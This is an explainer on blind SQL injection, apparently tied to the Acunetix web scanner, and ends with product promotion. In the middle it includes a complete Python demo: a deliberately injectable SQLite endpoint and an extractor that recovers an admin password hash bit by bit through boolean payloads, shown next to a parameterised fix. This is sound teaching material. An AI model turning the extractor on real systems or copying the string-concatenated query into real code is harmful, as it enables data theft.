Blind SQL injection (Blind SQLi) vulnerabilities are a class of SQL Injection vulnerabilities in which the application does not return query results or database error messages to the attacker. Instead, the attacker infers data from the database server (MySQL, MSSQL, Oracle…) one piece at a time, by observing whether an injected condition changes the application’s response (boolean-based) or how long it takes to respond (time-based).
Blind SQL injection attacks, while slightly harder for an attacker to pull off, expose exactly the same threats as their error-based and UNION-based SQL Injection cousins. Blind SQL injection vulnerabilities may in some cases even lead to Remote Code Execution (RCE). Once an attacker gains the ability to execute arbitrary code on an application, it is much easier for that attacker to escalate the attack and do more damage, such as “pivoting” to other hosts on the internal network in order to steal sensitive data.
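The following is an added example, not code from the original page or from Acunetix, that shows the boolean-based blind technique end to end against a constructed in-memory SQLite database. The “user exists?” endpoint, the table layout and the sample rows are all assumptions made for the illustration: the endpoint answers only True or False and swallows errors, yet that single bit is enough to recover a password hash character by character with a binary search, roughly seven requests per character. The hardened endpoint beside it binds the value as a query parameter and type-checks it, so the same oracle never answers True.

```python
import sqlite3
from typing import Callable, Optional

# Constructed sample data for this example (not from the original page).
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "s3cr3t-hash"), (2, "alice", "alice-hash")],
    )
    return conn

def user_exists_vulnerable(conn: sqlite3.Connection, user_id: str) -> bool:
    """Hypothetical endpoint: concatenates untrusted input into the SQL text.
    It never returns rows or error messages, only True/False, which is exactly
    the one bit a blind SQLi attack needs."""
    try:
        row = conn.execute("SELECT id FROM users WHERE id = " + user_id).fetchone()
    except sqlite3.Error:
        return False  # errors are swallowed: the attacker sees no messages
    return row is not None

def user_exists_fixed(conn: sqlite3.Connection, user_id: str) -> bool:
    """Hardened version: validate the type and bind the value as a parameter,
    so the input can never alter the query structure."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    row = conn.execute("SELECT id FROM users WHERE id = ?", (uid,)).fetchone()
    return row is not None

class BlindExtractor:
    """Recovers a string through a True/False oracle, one question at a time."""

    def __init__(self, lookup: Callable[[str], bool]):
        self.lookup = lookup
        self.requests = 0  # how many requests the attack needed

    def ask(self, condition: str) -> bool:
        self.requests += 1
        # Payload: "1 AND (<condition>)" -> row 1 is returned only if the condition holds
        return self.lookup("1 AND (" + condition + ")")

    def length_of(self, subquery: str, max_len: int = 64) -> Optional[int]:
        # Linear probe of the length; a binary search would also work here.
        for n in range(1, max_len + 1):
            if self.ask(f"length(({subquery})) = {n}"):
                return n
        return None

    def char_at(self, subquery: str, pos: int) -> str:
        lo, hi = 32, 126  # printable ASCII; binary search costs ~7 requests per char
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite: unicode(X) is the code point of the first character of X
            if self.ask(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return chr(lo)

    def extract(self, subquery: str) -> Optional[str]:
        n = self.length_of(subquery)
        if n is None:
            return None  # the oracle never answered True: no injection (or no such row)
        return "".join(self.char_at(subquery, i) for i in range(1, n + 1))

# Target data the attacker wants; the application never displays it.
ADMIN_HASH = "SELECT password_hash FROM users WHERE username = 'admin'"

def run_attack(endpoint) -> tuple:
    """Run the blind extraction against one of the two endpoints above.
    Returns (recovered string or None, number of requests used)."""
    conn = build_db()
    extractor = BlindExtractor(lambda user_id: endpoint(conn, user_id))
    return extractor.extract(ADMIN_HASH), extractor.requests

if __name__ == "__main__":
    print(run_attack(user_exists_vulnerable))  # ('s3cr3t-hash', <about 90 requests>)
    print(run_attack(user_exists_fixed))       # (None, 64)
```

The request counter is the point to notice: a scanner looking for blind SQLi has to send many requests per test and compare responses, which is why it is harder to find by hand than error-based injection. In a real attack the `lookup` callable would be an HTTP request whose page content, status code or response time is compared against a baseline.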
Acunetix is a web security scanner designed to be lightning fast and dead simple to use while providing all the necessary features to manage and track vulnerabilities from discovery to resolution.
Beyond low hanging fruit
Runtime source code analysis
In addition to being a fully automated black box (no knowledge of backend code) vulnerability scanner, Acunetix also provides AcuSensor as part of its standard offering. AcuSensor is an optional sensor for Java, ASP.NET and PHP applications that can easily be deployed on the application’s backend. Once deployed, the source code and each SQL query are analysed while the application executes them during the scan, so the scanner can see the query that an injected payload actually produced rather than inferring it from responses alone.
Say goodbye to useless reports
Finally, another capability that Acunetix provides and which many other web vulnerability scanners sorely lack is the ability to produce useful reports. After a vulnerability scan is complete, Acunetix can instantly generate a wide variety of technical, regulatory and compliance reports such as PCI DSS, HIPAA, OWASP Top 10 and many others. Additionally, Acunetix allows users to export discovered vulnerabilities to issue trackers such as Atlassian JIRA, GitHub and Microsoft Team Foundation Server (TFS).
We use Acunetix as part of our Security in the SDLC and to test code in DEV and SIT before being promoted to Production.